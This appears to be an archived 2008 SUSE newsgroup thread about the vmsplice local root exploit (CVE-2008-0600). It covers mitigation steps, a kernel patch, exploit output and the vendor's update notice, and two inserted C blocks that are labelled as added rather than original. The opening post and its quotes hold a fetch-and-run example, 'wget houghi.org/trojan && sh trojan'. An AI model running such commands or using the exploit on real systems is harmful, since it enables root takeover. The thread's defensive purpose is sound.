Welcome to the { mindfrost82.com } forums.
{ mindfrost82.com } > Gadget Corner > Tech Newsgroups > Linux > Suse
#1
Old 02-10-2008, 11:30 PM
houghi
Solution for the root exploit

http://disruptive.org.uk/2008/02/10/...t_exploit.html
http://it.slashdot.org/article.pl?sid=08/02/10/2011257
http://www.milw0rm.com/exploits/5092
http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14

1) See that gcc is installed
2) Download
http://www.ping.uio.no/~mortehu/disa...-exploitable.c
3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable`
4) run `./disable-exploitable`

Do this on ALL your machines.

This is really serious, as it means that ANY local user can otherwise
become root. This means that the following could be extremely dangerous:
`wget houghi.org/trojan && sh trojan`, because that could now run code
as root and do whatever.

houghi
--
The blue light suddenly flashed on my horrified face. What a disaster!
Oh, the humanity! I never thought it would happen to me. How terrifying
it is to see for yourself "*The Blue Screen of Death*".
#2
Old 02-11-2008, 01:48 AM
Nikos Chantziaras
Re: Solution for the root exploit

houghi wrote:
> http://disruptive.org.uk/2008/02/10/...t_exploit.html
> http://it.slashdot.org/article.pl?sid=08/02/10/2011257
> http://www.milw0rm.com/exploits/5092
> http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14
>
> 1) See that gcc is installed
> 2) Download
> http://www.ping.uio.no/~mortehu/disa...-exploitable.c
> 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable`
> 4) run `./disable-exploitable`
>
> Do this on ALL your machines.
>
> This is really serious, as it means that ANY local user can otherwise
> become root. This means that the following could be extremely dangerous:
> `wget houghi.org/trojan && sh trojan`, because that could now run code
> as root and do whatever.
>
> houghi


Holy crap! This is the kind of thing I didn't expect to be possible.
I'm running a 100+ users system here, and none of them can be trusted
(students); any tips on how to check if someone actually did it? Didn't
find anything through the usual means (/var/log and shell history).
#3
Old 02-11-2008, 01:52 AM
Nikos Chantziaras
Re: Solution for the root exploit

Nikos Chantziaras wrote:
> houghi wrote:
>> http://disruptive.org.uk/2008/02/10/...t_exploit.html
>> http://it.slashdot.org/article.pl?sid=08/02/10/2011257
>> http://www.milw0rm.com/exploits/5092
>> http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14
>>
>> 1) See that gcc is installed
>> 2) Download
>> http://www.ping.uio.no/~mortehu/disa...-exploitable.c
>> 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable`
>> 4) run `./disable-exploitable`
>>
>> Do this on ALL your machines.
>>
>> This is really serious, as it means that ANY local user can otherwise
>> become root. This means that the following could be extremely dangerous:
>> `wget houghi.org/trojan && sh trojan`, because that could now run code
>> as root and do whatever.
>>
>> houghi

>
> Holy crap! This is the kind of thing I didn't expect to be possible.
> I'm running a 100+ users system here, and none of them can be trusted
> (students); any tips on how to check if someone actually did it? Didn't
> find anything through the usual means (/var/log and shell history).


I just tested. The exploit doesn't work on the Fedora 8 stock kernel.
Phew. However, it does on the openSUSE 10.3 system ;P
#4
Old 02-11-2008, 02:23 AM
Nikos Chantziaras
Re: Solution for the root exploit

houghi wrote:
> http://disruptive.org.uk/2008/02/10/...t_exploit.html
> http://it.slashdot.org/article.pl?sid=08/02/10/2011257
> http://www.milw0rm.com/exploits/5092
> http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14


OK, so for those of you running custom kernels, a temporary patch has
appeared upstream that fixes the exploit without disabling vmsplice
(some applications won't run without it).

http://git.kernel.org/?p=linux/kerne... fb804f49cbc44

Instructions:

Open /usr/src/linux/fs/splice.c in a text editor. Go to line 1182. It
should read:

if (unlikely(!base))

If it's not in line 1182, simply do a search for that line; it only
appears once in the whole file.

*REPLACE* that line with:

if (!access_ok(VERIFY_READ, base, len))

Save, rebuild the kernel and reboot as usual:

cd /usr/src/linux
sudo make cloneconfig
sudo make
sudo make modules_install
sudo make install
sudo /sbin/reboot

(If you get a compilation error related to "squashfs", disable the
squashfs filesystem in the kernel.)

I've tested it and can confirm that this indeed fixes the exploit:

-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b0468a7c000 .. 0x2b0468aae000
[-] vmsplice: Bad address
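As an added illustration (not code from the thread, and not the kernel's own code), a small C model of what the one-line change above does: the original line rejects only a NULL base, while access_ok() rejects any user-supplied range that wraps around or reaches into kernel space. TASK_SIZE and the sample addresses are constructed values for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for the x86-64 user/kernel boundary (assumption for
 * this example): user addresses end below TASK_SIZE. */
#define TASK_SIZE 0x00007ffffffff000ULL

/* Unpatched line, if (unlikely(!base)): only a NULL base is rejected. */
bool old_check(uint64_t base, uint64_t len) {
    (void)len;
    return base != 0;
}

/* Model of access_ok(VERIFY_READ, base, len): the range [base, base+len)
 * must not wrap around and must end at or below the user/kernel boundary. */
bool access_ok_model(uint64_t base, uint64_t len) {
    uint64_t end;
    if (__builtin_add_overflow(base, len, &end))
        return false;                       /* base + len wrapped around */
    return end <= TASK_SIZE;
}

/* Would one iovec entry get past the check in get_iovec_page_array()? */
bool iov_accepted(uint64_t base, uint64_t len, bool patched) {
    return patched ? access_ok_model(base, len) : old_check(base, len);
}

int main(void) {
    /* Constructed sample entries; the kernel address is illustrative only. */
    struct { const char *what; uint64_t base, len; } cases[] = {
        { "ordinary user buffer",           0x4000ULL,             0x1000 },
        { "kernel-space address",           0xffffffff81000000ULL, 0x1000 },
        { "user base, length wraps around", 0x1000ULL,             UINT64_MAX },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-32s unpatched=%s patched=%s\n", cases[i].what,
               iov_accepted(cases[i].base, cases[i].len, false) ? "accept" : "reject",
               iov_accepted(cases[i].base, cases[i].len, true) ? "accept" : "reject");
    return 0;
}
```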
#5
Old 02-11-2008, 03:13 AM
David Bolt
Re: Solution for the root exploit

On Mon, 11 Feb 2008, houghi wrote:-

>http://disruptive.org.uk/2008/02/10/...t_exploit.html
>http://it.slashdot.org/article.pl?sid=08/02/10/2011257
>http://www.milw0rm.com/exploits/5092
>http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14
>
>1) See that gcc is installed
>2) Download
>http://www.ping.uio.no/~mortehu/disa...-exploitable.c
>3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable`
>4) run `./disable-exploitable`
>
>Do this on ALL your machines.


From reading the Debian link, this only affects kernels 2.6.17-2.6.24.1
which translates to openSUSE 10.2, openSUSE 10.3, and also openSUSE 11.0
alpha 2. SUSE 10.1 has kernel 2.6.16.54, which appears to be unaffected
by this exploit. Running the compiled code results in the response:

davjam@playing:/usr/src/packages/SOURCES> ./disable-vmsplice-if-exploitable
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x38
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[-] mmap: Invalid argument

and then it terminates.

>This is really serious, as it means that ANY local user can otherwise
>become root. This means that the following could be extremely dangerous:
>`wget houghi.org/trojan && sh trojan`, because that could now run code
>as root and do whatever.


As for the disable-vmsplice-if-exploitable.c, while it appears to work
on both my 10.3 32 and 64 bit systems, and fails as expected on 10.1, it
fails to compile on my 10.2 64bit system so I can't test it there.
Luckily, that 10.2 system isn't net-facing, the only user is myself, and
I don't need a root exploit as I know the root password. Doesn't mean I
won't be applying the kernel patch that's bound to come out within the
next few days.

Okay, I couldn't compile it on the 10.2 system so I compiled the source
on 10.3 as an un-optimized static ELF binary[0], ran it on 10.2 and
that's fixed the exploit.


[0] for the curious:

gcc -O0 --static -o disable-vmsplice-if-exploitable disable-vmsplice-if-exploitable.c

Regards,
David Bolt

--
www.davjam.org/lifetype/ www.distributed.net: OGR@100Mnodes, RC5-72@15Mkeys
SUSE 10.1 32bit | openSUSE 10.2 32bit | openSUSE 10.3 32bit | openSUSE 11.0a1
SUSE 10.1 64bit | openSUSE 10.2 64bit | openSUSE 10.3 64bit
RISC OS 3.6 | TOS 4.02 | openSUSE 10.3 PPC |RISC OS 3.11
#6
Old 02-11-2008, 09:29 PM
houghi
Re: Solution for the root exploit

houghi wrote:
<snip>

From the openSUSE security-announce mailinglist:
<quote>
Hi folks,

As you are undoubtedly aware a new local root exploit has been
discovered on the weekend and reported to a wide audience.

The CVE identifier is CVE-2008-0600.

The problem affects only kernels 2.6.17 and newer, so it affects
only the following of our products:
- openSUSE 10.2 (2.6.18.x kernel)
- openSUSE 10.3 (2.6.22.x kernel)


This problem does NOT affect all other products:
- SUSE Linux 10.1 (2.6.16.x kernel)
- SUSE Linux Enterprise 10 (2.6.16.x kernel)
- SUSE Linux Enterprise Server 9 (2.6.5 kernel)
- Novell Linux Desktop 9 (2.6.5 kernel)
- SUSE Linux Enterprise Server 8 (2.4.21 kernel)



Updates are in preparation for openSUSE 10.2 and 10.3 and will hopefully
be released tomorrow (Tuesday) morning German time.


Test kernel updates are available in our Online Update Betatest
Repositories:
- openSUSE 10.3: http://download.opensuse.org/update/10.3-test/
kernel version-release of fixed kernel: 2.6.22.17-0.1

- openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2-test/
kernel version-release of fixed kernel: 2.6.18.8-0.9

Please note that these update channels contain "beta" quality updates,
so are not recommended for production use systems. Only use the kernel.

Ciao, Marcus
</quote>

So best do an update tomorrow.

houghi
--
The blue light suddenly flashed on my horrified face. What a disaster!
Oh, the humanity! I never thought it would happen to me. How terrifying
it is to see for yourself "*The Blue Screen of Death*".
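As an added helper (not from the thread and not from SUSE), a C function that applies two facts quoted in this thread to a `uname -r` string: the affected range 2.6.17 through 2.6.24.1 from David Bolt's post, and the fixed openSUSE kernel version-releases from the announcement above. Treating an openSUSE package release at or above the announced ones as fixed, and the sample version strings, are assumptions of this example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
enum verdict { NOT_AFFECTED, FIXED_BY_UPDATE, VULNERABLE };
struct kver { int v[4]; int rel[2]; bool has_rel; };

/* Parse "2.6.22.17-0.1-default"-style strings; missing parts read as 0. */
static bool parse_kver(const char *s, struct kver *k) {
    memset(k, 0, sizeof *k);
    if (sscanf(s, "%d.%d.%d.%d", &k->v[0], &k->v[1], &k->v[2], &k->v[3]) < 3)
        return false;
    const char *dash = strchr(s, '-');          /* package release, if any */
    if (dash && sscanf(dash + 1, "%d.%d", &k->rel[0], &k->rel[1]) == 2)
        k->has_rel = true;
    return true;
}

/* Lexicographic comparison of two version arrays. */
static int cmp_ints(const int *a, const int *b, int n) {
    for (int i = 0; i < n; i++)
        if (a[i] != b[i]) return a[i] < b[i] ? -1 : 1;
    return 0;
}

enum verdict vmsplice_verdict(const char *uname_r) {
    struct kver k;
    const struct kver lo = {{2, 6, 17, 0}}, hi = {{2, 6, 24, 1}};
    /* openSUSE version-releases announced as fixed (10.3, then 10.2);
     * assumption: any later release of the same version keeps the fix. */
    const struct kver fixed[] = { {{2, 6, 22, 17}, {0, 1}, true},
                                  {{2, 6, 18, 8}, {0, 9}, true} };
    if (!parse_kver(uname_r, &k))
        return VULNERABLE;                      /* unparseable: assume the worst */
    if (cmp_ints(k.v, lo.v, 4) < 0 || cmp_ints(k.v, hi.v, 4) > 0)
        return NOT_AFFECTED;
    for (size_t i = 0; i < sizeof fixed / sizeof fixed[0]; i++)
        if (k.has_rel && cmp_ints(k.v, fixed[i].v, 4) == 0 &&
            cmp_ints(k.rel, fixed[i].rel, 2) >= 0)
            return FIXED_BY_UPDATE;
    return VULNERABLE;
}

int main(void) {
    /* Constructed sample strings; on a real box feed in the output of uname -r. */
    const char *samples[] = { "2.6.16.54-0.1-default", "2.6.22.5-31-default",
                              "2.6.22.17-0.1-default", "2.6.24.2" };
    const char *names[] = { "not affected", "fixed by update", "VULNERABLE" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-24s %s\n", samples[i], names[vmsplice_verdict(samples[i])]);
    return 0;
}
```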
#7
Old 02-11-2008, 09:48 PM
Michael Soibelman
Re: Solution for the root exploit

houghi wrote:

-----------------------------------------------snip-----------------------------------
>
> So best do an update tomorrow.
>
> houghi


And in the meantime let's hope they've all applied the patch you mentioned
previously....

Thanks for the heads up.

Applied and waiting.
#8
Old 02-12-2008, 09:44 AM
Lars Behrens
Re: Solution for the root exploit

houghi wrote:

> 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable`

^^ two hyphens
> 4) run `./disable-exploitable`

^ one hyphen

It should be `-o disable--exploitable` and `./disable--exploitable`
or `-o disable-exploitable` and `./disable-exploitable`, right?

Could you be a bit specific about what your workaround does, (I'm not much
into kernel hacking)?

TIA

--
Cheerz Lars
#9
Old 02-12-2008, 11:31 AM
houghi
Re: Solution for the root exploit

Lars Behrens wrote:
>
>
> houghi wrote:
>
>> 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable`

> ^^ two hyphens
>> 4) run `./disable-exploitable`

> ^ one hyphen
>
> It should be `-o disable--exploitable` and `./disable--exploitable`
> or `-o disable-exploitable` and `./disable-exploitable`, right?


Yes, sorry.

> Could you be a bit specific about what your workaround does, (I'm not much
> into kernel hacking)?


It is not my hack. It is a copy and paste hack from somebody else.
Basically what it does is NOT change the kernel in any way. It just makes
it impossible to run the exploit.

However when you reboot, the machine is vulnerable again. So you need to
run it again at bootup (automagically) or patch your system. I myself am
waiting for the patch to come out, as I am the sole user on my system.

houghi
--
You tried, and you failed, so the lesson is, never try. - Homer J. Simpson.
#10
Old 02-12-2008, 01:00 PM
houghi
Re: Solution for the root exploit

houghi wrote:
<snip>
The updates are available:
Fixed packages have been released for openSUSE 10.2 and 10.3.

For SUSE Linux Enterprise Realtime 10 packages are being prepared
currently.


houghi
--
You tried, and you failed, so the lesson is, never try. - Homer J. Simpson.